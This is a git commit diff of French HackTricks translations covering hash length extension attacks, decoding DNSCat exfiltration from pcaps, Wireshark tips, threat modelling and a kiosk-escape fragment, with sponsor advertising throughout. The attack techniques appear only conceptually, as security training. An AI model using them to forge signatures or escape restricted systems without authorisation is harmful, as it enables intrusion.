Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

This commit is contained in:
Translator 2024-04-18 04:01:29 +00:00
parent a8c4f29ccb
commit 6ff7ee387a
35 changed files with 619 additions and 559 deletions

View file

@ -44,7 +44,7 @@ Vous pouvez consulter leur **blog** sur [**https://blog.stmcyber.com**](https://
**Intigriti** est la plateforme de **bug bounty** et de **piratage éthique n°1 en Europe.**
**Astuce de bug bounty**: **Inscrivez-vous** sur **Intigriti**, une **plateforme de bug bounty premium créée par des pirates, pour des pirates**! Rejoignez-nous sur [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) aujourd'hui et commencez à gagner des primes allant jusqu'à **100 000 $**!
**Astuce de bug bounty**: **Inscrivez-vous** sur **Intigriti**, une **plateforme de bug bounty premium créée par des hackers, pour des hackers**! Rejoignez-nous sur [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) aujourd'hui, et commencez à gagner des primes allant jusqu'à **100 000 $**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -55,7 +55,7 @@ Vous pouvez consulter leur **blog** sur [**https://blog.stmcyber.com**](https://
<figure><img src=".gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour construire et **automatiser facilement des workflows** alimentés par les outils communautaires les plus avancés au monde.
Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour construire et **automatiser des workflows** alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui:
@ -67,13 +67,13 @@ Accédez dès aujourd'hui:
<figure><img src=".gitbook/assets/image (47).png" alt=""><figcaption></figcaption></figure>
Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des pirates expérimentés et des chasseurs de primes!
Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des hackers expérimentés et des chasseurs de primes!
* **Perspectives de Piratage:** Impliquez-vous dans du contenu qui explore l'excitation et les défis du piratage
* **Actualités de Piratage en Temps Réel:** Restez informé sur le monde du piratage à rythme rapide grâce aux actualités et perspectives en temps réel
* **Dernières Annonces:** Restez informé des derniers lancements de bug bounties et des mises à jour cruciales de la plateforme
* **Dernières Annonces:** Restez informé des derniers bug bounties lancés et des mises à jour cruciales de la plateforme
**Rejoignez-nous sur** [**Discord**](https://discord.com/invite/N3FrSbmwdy) et commencez à collaborer avec les meilleurs pirates dès aujourd'hui!
**Rejoignez-nous sur** [**Discord**](https://discord.com/invite/N3FrSbmwdy) et commencez à collaborer avec les meilleurs hackers dès aujourd'hui!
***
@ -116,16 +116,16 @@ Vous pouvez **créer un compte gratuit** [**ici**](https://serpapi.com/users/sig
[**WebSec**](https://websec.nl) est une entreprise de cybersécurité professionnelle basée à **Amsterdam** qui aide à **protéger** les entreprises **du monde entier** contre les dernières menaces en cybersécurité en fournissant des services de **sécurité offensive** avec une **approche moderne**.
WebSec est une entreprise de sécurité **tout-en-un**, ce qui signifie qu'ils font tout; Tests d'intrusion, Audits de sécurité, Formations en sensibilisation, Campagnes de phishing, Revue de code, Développement d'exploits, Externalisation d'experts en sécurité et bien plus encore.
WebSec est une **entreprise de sécurité tout-en-un** ce qui signifie qu'ils font tout; Tests d'intrusion, Audits de sécurité, Formations en sensibilisation, Campagnes de phishing, Revue de code, Développement d'exploits, Externalisation d'experts en sécurité et bien plus encore.
Une autre chose cool à propos de WebSec est que contrairement à la moyenne de l'industrie, WebSec est **très confiant dans ses compétences**, à tel point qu'ils **garantissent les meilleurs résultats de qualité**, il est indiqué sur leur site web "**Si nous ne pouvons pas le pirater, vous ne le payez pas!**". Pour plus d'informations, consultez leur [**site web**](https://websec.nl/en/) et leur [**blog**](https://websec.nl/blog/)!
En plus de ce qui précède, WebSec est également un **supporter engagé de HackTricks.**
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
@ -151,7 +151,7 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

View file

@ -1,20 +1,20 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -30,14 +30,14 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
Imaginez un serveur qui **signe** des **données** en **ajoutant** un **secret** à des données en clair connues, puis en hachant ces données. Si vous connaissez :
* **La longueur du secret** (celle-ci peut également être forcée dans une plage de longueurs données)
* **La longueur du secret** (cela peut également être obtenu par force brute dans une plage de longueurs donnée)
* **Les données en clair**
* **L'algorithme (et s'il est vulnérable à cette attaque)**
* **Le padding est connu**
* Habituellement, un padding par défaut est utilisé, donc si les 3 autres conditions sont remplies, celui-ci l'est aussi
* Le padding varie en fonction de la longueur du secret+des données, c'est pourquoi la longueur du secret est nécessaire
* Le padding varie en fonction de la longueur du secret + des données, c'est pourquoi la longueur du secret est nécessaire
Alors, il est possible pour un **attaquant** d'**ajouter** des **données** et de **générer** une signature valide pour les **données précédentes + données ajoutées**.
Alors, il est possible pour un **attaquant** d'**ajouter** des **données** et de **générer** une signature valide pour les **données précédentes + les données ajoutées**.
## Comment ?
@ -59,9 +59,9 @@ Si un attaquant souhaite ajouter la chaîne "append", il peut :
Vous pouvez trouver cette attaque bien expliquée dans [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -73,13 +73,13 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.

View file

@ -2,9 +2,9 @@
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks:
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
@ -12,10 +12,23 @@ Autres façons de soutenir HackTricks:
</details>
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
{% embed url="https://whiteintel.io" %}
---
Si vous avez un pcap avec des données **exfiltrées par DNSCat** (sans utilisation de chiffrement), vous pouvez trouver le contenu exfiltré.
Vous devez seulement savoir que les **9 premiers octets** ne sont pas des données réelles mais sont liés à la **communication C\&C**:
Vous devez seulement savoir que les **9 premiers octets** ne sont pas des données réelles mais sont liés à la **communication C\&C** :
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -44,14 +57,14 @@ python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
D'autres façons de soutenir HackTricks:
Autres façons de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,7 +1,5 @@
# Astuces Wireshark
## Astuces Wireshark
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -16,6 +14,20 @@ Autres façons de soutenir HackTricks :
</details>
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
{% embed url="https://whiteintel.io" %}
---
## Améliorez vos compétences Wireshark
### Tutoriels
@ -31,49 +43,49 @@ Les tutoriels suivants sont excellents pour apprendre quelques astuces de base i
**Informations d'expert**
En cliquant sur _**Analyser** --> **Informations d'expert**_ vous aurez un **aperçu** de ce qui se passe dans les paquets **analysés** :
En cliquant sur _**Analyser** --> **Informations d'expert**_, vous aurez un **aperçu** de ce qui se passe dans les paquets **analysés** :
![](<../../../.gitbook/assets/image (253).png>)
**Adresses résolues**
Sous _**Statistiques --> Adresses résolues**_ vous pouvez trouver plusieurs **informations** qui ont été "**résolues**" par Wireshark comme le port/transport vers le protocole, l'adresse MAC vers le fabricant, etc. Il est intéressant de savoir ce qui est impliqué dans la communication.
Sous _**Statistiques --> Adresses résolues**_, vous pouvez trouver plusieurs **informations** qui ont été "**résolues**" par Wireshark comme le port/transport au protocole, l'adresse MAC au fabricant, etc. Il est intéressant de savoir ce qui est impliqué dans la communication.
![](<../../../.gitbook/assets/image (890).png>)
**Hiérarchie des protocoles**
Sous _**Statistiques --> Hiérarchie des protocoles**_ vous pouvez trouver les **protocoles** **impliqués** dans la communication et des données à leur sujet.
Sous _**Statistiques --> Hiérarchie des protocoles**_, vous pouvez trouver les **protocoles** **impliqués** dans la communication et des données à leur sujet.
![](<../../../.gitbook/assets/image (583).png>)
**Conversations**
Sous _**Statistiques --> Conversations**_ vous pouvez trouver un **résumé des conversations** dans la communication et des données à leur sujet.
Sous _**Statistiques --> Conversations**_, vous pouvez trouver un **résumé des conversations** dans la communication et des données à leur sujet.
![](<../../../.gitbook/assets/image (450).png>)
**Points d'extrémité**
**Points de terminaison**
Sous _**Statistiques --> Points d'extrémité**_ vous pouvez trouver un **résumé des points d'extrémité** dans la communication et des données à leur sujet.
Sous _**Statistiques --> Points de terminaison**_, vous pouvez trouver un **résumé des points de terminaison** dans la communication et des données à leur sujet.
![](<../../../.gitbook/assets/image (893).png>)
**Infos DNS**
Sous _**Statistiques --> DNS**_ vous pouvez trouver des statistiques sur les requêtes DNS capturées.
Sous _**Statistiques --> DNS**_, vous pouvez trouver des statistiques sur les requêtes DNS capturées.
![](<../../../.gitbook/assets/image (1060).png>)
**Graphique E/S**
Sous _**Statistiques --> Graphique E/S**_ vous pouvez trouver un **graphique de la communication**.
Sous _**Statistiques --> Graphique E/S**_, vous pouvez trouver un **graphique de la communication**.
![](<../../../.gitbook/assets/image (989).png>)
### Filtres
Ici vous pouvez trouver des filtres Wireshark en fonction du protocole : [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Ici, vous pouvez trouver des filtres Wireshark en fonction du protocole : [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Autres filtres intéressants :
- `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
@ -85,7 +97,7 @@ Autres filtres intéressants :
### Recherche
Si vous souhaitez **rechercher** du **contenu** à l'intérieur des **paquets** des sessions, appuyez sur _CTRL+f_. Vous pouvez ajouter de nouvelles couches à la barre d'informations principale (No., Temps, Source, etc.) en appuyant sur le bouton droit puis sur modifier la colonne.
Si vous souhaitez **rechercher** du **contenu** à l'intérieur des **paquets** des sessions, appuyez sur _CTRL+f_. Vous pouvez ajouter de nouvelles couches à la barre d'informations principale (N°, Heure, Source, etc.) en appuyant sur le bouton droit, puis sur modifier la colonne.
### Laboratoires pcap gratuits
@ -136,10 +148,9 @@ Un fichier de clés partagées ressemblera à ceci :
Pour importer cela dans Wireshark, allez à \_modifier > préférence > protocole > ssl > et importez-le dans (Pré)-Master-Secret log filename :
![](<../../../.gitbook/assets/image (986).png>)
## Communication ADB
Extraire un APK d'une communication ADB où l'APK a été envoyé :
Extraire un APK à partir d'une communication ADB où l'APK a été envoyé :
```python
from scapy.all import *
@ -166,15 +177,28 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Leur objectif principal est de lutter contre les piratages de comptes et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
D'autres façons de soutenir HackTricks :
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

View file

@ -1,12 +1,12 @@
# Modélisation des Menaces
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
L'objectif principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -16,12 +16,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Modélisation des Menaces
Bienvenue dans le guide complet de HackTricks sur la modélisation des menaces ! Lancez-vous dans une exploration de cet aspect critique de la cybersécurité, où nous identifions, comprenons et élaborons des stratégies contre les vulnérabilités potentielles d'un système. Ce fil conducteur sert de guide étape par étape rempli d'exemples concrets, de logiciels utiles et d'explications faciles à comprendre. Idéal pour les novices et les praticiens expérimentés cherchant à renforcer leurs défenses en cybersécurité.
Bienvenue dans le guide complet de HackTricks sur la modélisation des menaces ! Lancez-vous dans une exploration de cet aspect crucial de la cybersécurité, où nous identifions, comprenons et élaborons des stratégies contre les vulnérabilités potentielles d'un système. Ce fil conducteur sert de guide étape par étape rempli d'exemples concrets, de logiciels utiles et d'explications faciles à comprendre. Idéal pour les novices et les praticiens expérimentés cherchant à renforcer leurs défenses en cybersécurité.
### Scénarios Couramment Utilisés
1. **Développement de Logiciels** : Dans le cadre du Cycle de Vie de Développement de Logiciels Sécurisé (SSDLC), la modélisation des menaces aide à **identifier les sources potentielles de vulnérabilités** dès les premières étapes du développement.
2. **Tests de Pénétration** : Le cadre d'exécution des tests de pénétration (PTES) exige la **modélisation des menaces pour comprendre les vulnérabilités du système** avant d'effectuer le test.
2. **Tests de Pénétration** : Le cadre d'exécution des tests de pénétration (PTES) exige la modélisation des menaces pour comprendre les vulnérabilités du système avant d'effectuer le test.
### Modèle de Menace en Bref
@ -31,7 +31,7 @@ Les modèles de menace comportent souvent des éléments marqués en rouge, symb
### La Triade CIA
La Triade CIA est un modèle largement reconnu dans le domaine de la sécurité de l'information, représentant la Confidentialité, l'Intégrité et la Disponibilité. Ces trois piliers constituent la base sur laquelle de nombreuses mesures de sécurité et politiques sont construites, y compris les méthodologies de modélisation des menaces.
La Triade CIA est un modèle largement reconnu dans le domaine de la sécurité de l'information, représentant la Confidentialité, l'Intégrité et la Disponibilité. Ces trois piliers forment la base sur laquelle de nombreuses mesures de sécurité et politiques sont construites, y compris les méthodologies de modélisation des menaces.
1. **Confidentialité** : Garantir que les données ou le système ne sont pas accessibles par des individus non autorisés. Il s'agit d'un aspect central de la sécurité, nécessitant des contrôles d'accès appropriés, le chiffrement et d'autres mesures pour prévenir les violations de données.
2. **Intégrité** : L'exactitude, la cohérence et la fiabilité des données tout au long de leur cycle de vie. Ce principe garantit que les données ne sont pas altérées ou manipulées par des parties non autorisées. Il implique souvent des sommes de contrôle, des hachages et d'autres méthodes de vérification des données.
@ -40,11 +40,11 @@ La Triade CIA est un modèle largement reconnu dans le domaine de la sécurité
### Méthodologies de Modélisation des Menaces
1. **STRIDE** : Développé par Microsoft, STRIDE est un acronyme pour **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service et Elevation of Privilege**. Chaque catégorie représente un type de menace, et cette méthodologie est couramment utilisée dans la phase de conception d'un programme ou d'un système pour identifier les menaces potentielles.
2. **DREAD** : Il s'agit d'une autre méthodologie de Microsoft utilisée pour l'évaluation des risques des menaces identifiées. DREAD signifie **Dommages potentiels, Reproductibilité, Exploitabilité, Utilisateurs affectés et Découvrabilité**. Chacun de ces facteurs est évalué, et le résultat est utilisé pour prioriser les menaces identifiées.
2. **DREAD** : Il s'agit d'une autre méthodologie de Microsoft utilisée pour l'évaluation des risques des menaces identifiées. DREAD signifie **Damage potential, Reproducibility, Exploitability, Affected users et Discoverability**. Chacun de ces facteurs est noté, et le résultat est utilisé pour prioriser les menaces identifiées.
3. **PASTA** (Process for Attack Simulation and Threat Analysis) : Il s'agit d'une méthodologie en sept étapes, centrée sur les risques. Elle comprend la définition et l'identification des objectifs de sécurité, la création d'un périmètre technique, la décomposition de l'application, l'analyse des menaces, l'analyse des vulnérabilités et l'évaluation des risques/triages.
4. **Trike** : Il s'agit d'une méthodologie basée sur les risques qui se concentre sur la défense des actifs. Elle part d'une perspective de **gestion des risques** et examine les menaces et les vulnérabilités dans ce contexte.
5. **VAST** (Visual, Agile, and Simple Threat modeling) : Cette approche vise à être plus accessible et s'intègre dans les environnements de développement Agile. Elle combine des éléments des autres méthodologies et se concentre sur les **représentations visuelles des menaces**.
6. **OCTAVE** (Operationally Critical Threat, Asset, and Vulnerability Evaluation) : Développé par le CERT Coordination Center, ce cadre est orienté vers l'**évaluation des risques organisationnels plutôt que des systèmes ou des logiciels spécifiques**.
5. **VAST** (Visual, Agile et Simple Threat modeling) : Cette approche vise à être plus accessible et s'intègre dans les environnements de développement Agile. Elle combine des éléments des autres méthodologies et se concentre sur les **représentations visuelles des menaces**.
6. **OCTAVE** (Operationally Critical Threat, Asset et Vulnerability Evaluation) : Développé par le CERT Coordination Center, ce cadre est axé sur **l'évaluation des risques organisationnels plutôt que sur des systèmes ou des logiciels spécifiques**.
## Outils
@ -52,7 +52,7 @@ Il existe plusieurs outils et solutions logicielles disponibles qui peuvent **ai
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
Une araignée/crawler web GUI avancée multiplateforme et multifonctionnelle pour les professionnels de la cybersécurité. Spider Suite peut être utilisé pour la cartographie et l'analyse de la surface d'attaque.
Une araignée/crawler web GUI multiplateforme avancée et multi-fonctionnelle pour les professionnels de la cybersécurité. Spider Suite peut être utilisé pour la cartographie et l'analyse de la surface d'attaque.
**Utilisation**
@ -78,7 +78,7 @@ Parfois, cela pourrait ressembler à ceci :
<figure><img src="../.gitbook/assets/1_threatmodel_create_project.jpg" alt=""><figcaption></figcaption></figure>
2. Lancez le Nouveau Projet
2. Lancez un Nouveau Projet
<figure><img src="../.gitbook/assets/launch_new_project_2.jpg" alt=""><figcaption></figcaption></figure>
@ -124,9 +124,9 @@ Maintenant, votre modèle fini devrait ressembler à ceci. Et voilà comment vou
Il s'agit d'un outil gratuit de Microsoft qui aide à trouver les menaces dans la phase de conception des projets logiciels. Il utilise la méthodologie STRIDE et est particulièrement adapté à ceux qui développent sur la pile technologique de Microsoft.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.

View file

@ -2,7 +2,7 @@
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
D'autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
@ -12,9 +12,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -46,7 +46,7 @@ Vous devriez vérifier si vous pouvez :
## Exécution de commandes
Peut-être **en utilisant une option `Ouvrir avec`** vous pouvez ouvrir/exécuter une sorte de shell.
Peut-être qu'en utilisant l'option `Ouvrir avec`, vous pouvez ouvrir/exécuter une sorte de shell.
### Windows
